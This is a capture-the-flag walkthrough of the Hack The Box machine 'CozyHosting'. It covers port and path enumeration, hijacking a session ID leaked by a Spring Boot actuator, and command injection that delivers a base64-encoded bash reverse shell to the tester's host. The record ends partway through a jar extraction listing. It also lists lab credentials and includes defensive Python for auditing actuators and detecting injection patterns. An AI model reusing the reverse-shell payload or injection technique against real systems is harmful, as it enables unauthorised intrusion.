HTB CozyHosting done
CozyHosting
OS:
Linux
Technology:
Spring Boot (Java framework)
IP Address:
10.10.11.230
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and passwords:
From: http://cozyhosting.htb/actuator/sessions
user: kanderson
cookie: 77C3563811D9CBBD4E0A6E799EC50E23
---
From file: /tmp/cloudhosting/BOOT-INF/classes/application.properties
postgresql://localhost:5432/cozyhosting
username=postgres
password=Vg&nvzAQ7XxR
---
SSH user: josh
L: josh
P: manchesterunited
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.230_nmap 10.10.11.230 ; cat 10.10.11.230_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 22:22 UTC
Nmap scan report for 10.10.11.230
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add the hostname to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ cat /etc/hosts | grep cozyhosting
10.10.11.230 cozyhosting.htb
ffuf: http://cozyhosting.htb - big.txt
Interesting path: admin (401)
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ffuf -u http://cozyhosting.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o cozyhosting.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : cozyhosting.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin [Status: 401, Size: 97, Words: 1, Lines: 1, Duration: 86ms]
asdfjkl;.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 50ms]
asdfjkl;.txt [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl;.html [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl; [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
asdfjkl;.bac [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 55ms]
asdfjkl;.backup [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
error [Status: 500, Size: 73, Words: 1, Lines: 1, Duration: 63ms]
index [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 82ms]
login [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 49ms]
logout [Status: 204, Size: 0, Words: 1, Lines: 1, Duration: 256ms]
:: Progress: [122814/122814] :: Job [1/1] :: 485 req/sec :: Duration: [0:04:59] :: Errors: 0 ::
ffuf: http://cozyhosting.htb - spring-boot.txt
Interesting path: actuator
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ffuf -u http://cozyhosting.htb/FUZZ -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt -ac -recursion -recursion-depth=1 -o cozyhosting.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : cozyhosting.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 231ms]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 99ms]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 129ms]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 148ms]
actuator/sessions [Status: 200, Size: 48, Words: 1, Lines: 1, Duration: 62ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 562ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 624ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 626ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 605ms]
:: Progress: [672/672] :: Job [1/1] :: 576 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
Open the website: http://cozyhosting.htb/actuator
The index lists several endpoints; I focus on /actuator/sessions
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ curl -s http://cozyhosting.htb/actuator | jq
{
"_links": {
"self": {
"href": "http://localhost:8080/actuator",
"templated": false
},
"sessions": {
"href": "http://localhost:8080/actuator/sessions",
"templated": false
},
"beans": {
"href": "http://localhost:8080/actuator/beans",
"templated": false
},
"health": {
"href": "http://localhost:8080/actuator/health",
"templated": false
},
"health-path": {
"href": "http://localhost:8080/actuator/health/{*path}",
"templated": true
},
"env": {
"href": "http://localhost:8080/actuator/env",
"templated": false
},
"env-toMatch": {
"href": "http://localhost:8080/actuator/env/{toMatch}",
"templated": true
},
"mappings": {
"href": "http://localhost:8080/actuator/mappings",
"templated": false
}
}
}
Open the website: http://cozyhosting.htb/actuator/sessions
It lists a username and what looks like its live session ID (a guess at this point)
U: kanderson
Session ID: 77C3563811D9CBBD4E0A6E799EC50E23
---
http://cozyhosting.htb/actuator/sessions
77C3563811D9CBBD4E0A6E799EC50E23 "kanderson"
2D0888E10E24803A1363CDB52E16E51F "UNAUTHORIZED"
Open the website: http://cozyhosting.htb/admin
Set the JSESSIONID cookie to kanderson's session ID:
JSESSIONID: 77C3563811D9CBBD4E0A6E799EC50E23
user: kanderson
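The root cause of this foothold is an actuator index exposed without authentication, with the `sessions` endpoint handing out live session IDs. The following is an added example, not code from the writeup or from the CozyHosting application: a small audit helper that reads an actuator index document of the shape shown above and classifies every advertised endpoint by the damage an anonymous reader can do with it. The risk table is my own classification (an assumption written for this example, not an official Spring list), and the sample index is constructed to mirror the JSON returned by the box.

```python
import json

# Risk notes per actuator endpoint. Assumption: this classification is written
# for this example from general Spring Boot knowledge; it is neither the
# project's configuration nor an official Spring list.
ACTUATOR_RISK = {
    "sessions":    ("high",   "lists live session IDs; any reader can reuse a logged-in user's cookie"),
    "env":         ("high",   "dumps configuration properties, often including datasource credentials"),
    "heapdump":    ("high",   "serves a JVM heap dump that contains in-memory secrets"),
    "beans":       ("medium", "enumerates every bean and class, mapping the application internals"),
    "mappings":    ("medium", "enumerates every HTTP route, including unlinked admin handlers"),
    "configprops": ("medium", "shows resolved @ConfigurationProperties values"),
    "loggers":     ("medium", "lets callers change log levels at runtime"),
    "health":      ("low",    "liveness status; normally acceptable on an internal network"),
}

# Constructed sample: the shape of the /actuator index seen in the writeup.
SAMPLE_INDEX = json.dumps({"_links": {
    "self":        {"href": "http://localhost:8080/actuator", "templated": False},
    "sessions":    {"href": "http://localhost:8080/actuator/sessions", "templated": False},
    "beans":       {"href": "http://localhost:8080/actuator/beans", "templated": False},
    "health":      {"href": "http://localhost:8080/actuator/health", "templated": False},
    "health-path": {"href": "http://localhost:8080/actuator/health/{*path}", "templated": True},
    "env":         {"href": "http://localhost:8080/actuator/env", "templated": False},
    "env-toMatch": {"href": "http://localhost:8080/actuator/env/{toMatch}", "templated": True},
    "mappings":    {"href": "http://localhost:8080/actuator/mappings", "templated": False},
}})


def exposed_endpoints(index_json):
    """Return the distinct endpoint names advertised by an actuator index.

    Templated variants such as 'env-toMatch' or 'health-path' belong to the
    endpoint named before the first hyphen; 'self' is the index itself.
    """
    links = json.loads(index_json).get("_links", {})
    names = {rel.split("-", 1)[0] for rel in links if rel != "self"}
    return sorted(names)


def audit_actuator_index(index_json):
    """Return [(endpoint, severity, reason)] for every advertised endpoint,
    most severe first. Unknown endpoints are reported as 'review'."""
    order = {"high": 0, "medium": 1, "low": 2, "review": 3}
    findings = []
    for name in exposed_endpoints(index_json):
        severity, reason = ACTUATOR_RISK.get(
            name, ("review", "not classified; check the endpoint's documentation"))
        findings.append((name, severity, reason))
    return sorted(findings, key=lambda f: (order[f[1]], f[0]))


def high_risk_endpoints(index_json):
    """Names of endpoints that must never be reachable without authentication."""
    return [n for n, sev, _ in audit_actuator_index(index_json) if sev == "high"]


if __name__ == "__main__":
    for name, severity, reason in audit_actuator_index(SAMPLE_INDEX):
        print(f"{severity:6} {name:12} {reason}")
```

On the box this reports `env` and `sessions` as high risk. The fix on the Spring Boot side is to stop exposing them at all (`management.endpoints.web.exposure.include=health`, a real Spring Boot property) and to put whatever remains behind the same authentication as `/admin`, or on a separate management port that is not reachable through the public nginx.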
Command injection -> reverse shell
Create the payload (base64-encoded):
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ echo "bash -i -p >& /dev/tcp/10.10.14.25/80 0>&1" | base64
YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS84MCAwPiYxCg==
Reverse shell
* Submit the payload through the website
Payload:
user;echo${IFS}YmFzaCAtaSAtcCA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS84MCAwPiYxCg==|base64${IFS}-d|bash;
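The payload works because the admin feature hands a user-supplied username to a shell, and `${IFS}` stands in for the spaces the input filter strips. The following is an added example, not code from the writeup or from the CozyHosting application, showing both halves of the defence: an allowlist plus argv-style command construction (the Java equivalent is `ProcessBuilder` with one argument per element), and a detector for the same metacharacter tricks in values an application has logged. The assumption that the feature takes a Unix login name and a DNS hostname is mine; the sample submissions are constructed, and the base64 blob in them is a placeholder rather than a real encoded command.

```python
import re

# Allowlists for the two values the admin feature is assumed to pass to ssh
# (assumption: a Unix login name and a DNS hostname).
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def is_safe_username(value):
    return bool(USERNAME_RE.match(value))


def is_safe_hostname(value):
    return bool(HOSTNAME_RE.match(value))


def build_ssh_argv(username, hostname):
    """Build the ssh command as an argv list, never as a shell string.

    With an argv list there is no shell to interpret ';', '|' or ${IFS}; the
    only remaining risk is option injection (a value starting with '-'), which
    the allowlists already exclude. Returned, not executed, so it can be tested.
    """
    if not is_safe_username(username):
        raise ValueError("username rejected by allowlist")
    if not is_safe_hostname(hostname):
        raise ValueError("hostname rejected by allowlist")
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
            f"{username}@{hostname}", "true"]


# Detection side: patterns that should never appear in a username field.
INJECTION_PATTERNS = [
    (re.compile(r"\$\{?IFS\}?"), "IFS used as a whitespace substitute"),
    (re.compile(r"[;&|`\n]"), "shell command separator"),
    (re.compile(r"\$\("), "command substitution"),
    (re.compile(r"\bbase64\b"), "base64 decoder invoked"),
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
]


def classify_input(value):
    """Return the detection reasons that match one submitted value."""
    return [reason for pattern, reason in INJECTION_PATTERNS if pattern.search(value)]


def scan_submitted_values(values):
    """Return [(value, reasons)] for every value that trips at least one pattern."""
    flagged = []
    for value in values:
        reasons = classify_input(value)
        if reasons:
            flagged.append((value, reasons))
    return flagged


# Constructed sample of values submitted to the username field. "QUJD" is
# base64 of "ABC", a placeholder standing in for a real encoded command.
SAMPLE_SUBMISSIONS = [
    "kanderson",
    "deploy-bot",
    "user;echo${IFS}QUJD|base64${IFS}-d|bash;",
    "bob$(id)",
]

if __name__ == "__main__":
    print(build_ssh_argv("kanderson", "cozyhosting.htb"))
    for value, reasons in scan_submitted_values(SAMPLE_SUBMISSIONS):
        print(f"FLAGGED {value!r}: {', '.join(reasons)}")
```

Stripping spaces, as the application evidently does, is not a mitigation: the allowlist rejects the whole value instead of trying to remove the dangerous characters, and the argv construction means nothing that slips through is ever parsed by a shell. The detector is the retrospective counterpart for checking whether anyone tried this before the fix shipped.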
---
* Start the listener and catch the shell
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.11.230] 33400
bash: cannot set terminal process group (1060): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
app@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$
Lateral movement
Unzip the application jar: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ unzip -d /tmp/cloudhosting cloudhosting-0.0.1.jar
unzip -d /tmp/cloudhosting cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: /tmp/cloudhosting/META-INF/
inflating: /tmp/cloudhosting/META-INF/MANIFEST.MF
creating: /tmp/cloudhosting/org/
creating: /tmp/cloudhosting/org/springframework/
creating: /tmp/cloudhosting/org/springframework/boot/
creating: /tmp/cloudhosting/org/springframework/boot/loader/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/ClassPathIndexFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/ExecutableArchiveLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/JarLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader$DefinePackageCallType.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader$UseFastConnectionExceptionsEnumeration.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/LaunchedURLClassLoader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/Launcher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/MainMethodRunner.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$ArchiveEntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$ClassPathArchives.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher$PrefixMatchingArchiveFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/PropertiesLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/WarLauncher.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/archive/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive$Entry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive$EntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/Archive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$AbstractIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$ArchiveIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$FileEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive$SimpleJarFileArchive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/ExplodedArchive.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$AbstractIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$JarFileEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive$NestedArchiveIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/archive/JarFileArchive.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/data/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessData.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile$DataInputStream.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile$FileAccess.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/data/RandomAccessDataFile.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/jar/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AbstractJarFile$JarFileType.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AbstractJarFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/AsciiBytes.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/Bytes.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord$Zip64End.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord$Zip64Locator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryEndRecord.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryFileHeader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryParser.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/CentralDirectoryVisitor.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/FileHeader.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/Handler.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntry.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntryCertification.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarEntryFilter.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile$JarEntryEnumeration.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFile.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$EntryIterator.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$Offsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$Zip64Offsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries$ZipOffsets.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileEntries.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarFileWrapper.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection$1.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection$JarEntryName.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/JarURLConnection.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/StringSequence.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jar/ZipInflaterInputStream.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/JarMode.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/JarModeLauncher.class
inflating: /tmp/cloudhosting/org/springframework/boot/loader/jarmode/TestJarMode.class
creating: /tmp/cloudhosting/org/springframework/boot/loader/util/
inflating: /tmp/cloudhosting/org/springframework/boot/loader/util/SystemPropertyUtils.class
creating: /tmp/cloudhosting/BOOT-INF/
creating: /tmp/cloudhosting/BOOT-INF/classes/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/compliance/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/scheduled/
creating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/exception/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/php-email-form/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/
creating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/
creating: /tmp/cloudhosting/BOOT-INF/classes/templates/
creating: /tmp/cloudhosting/META-INF/maven/
creating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/
creating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/UserRepository.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/MvcConfig.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/CozyHostingApp.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/secutiry/LoginListener.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/htb/cloudhosting/exception/ExceptionHandler.class
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/admin.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/css/style.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/main.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/js/admin.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/footer-bg.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/hero-bg.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/profile-img.jpg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-2.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-3.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-starter.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/values-1.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-free.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/favicon.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/logo.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-ultimate.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/pricing-business.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/img/hero-img.png
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/swiper/swiper-bundle.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/isotope.pkgd.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/isotope-layout/isotope.pkgd.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-utilities.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.rtl.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.min.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-grid.rtl.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/css/bootstrap-reboot.css.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.js
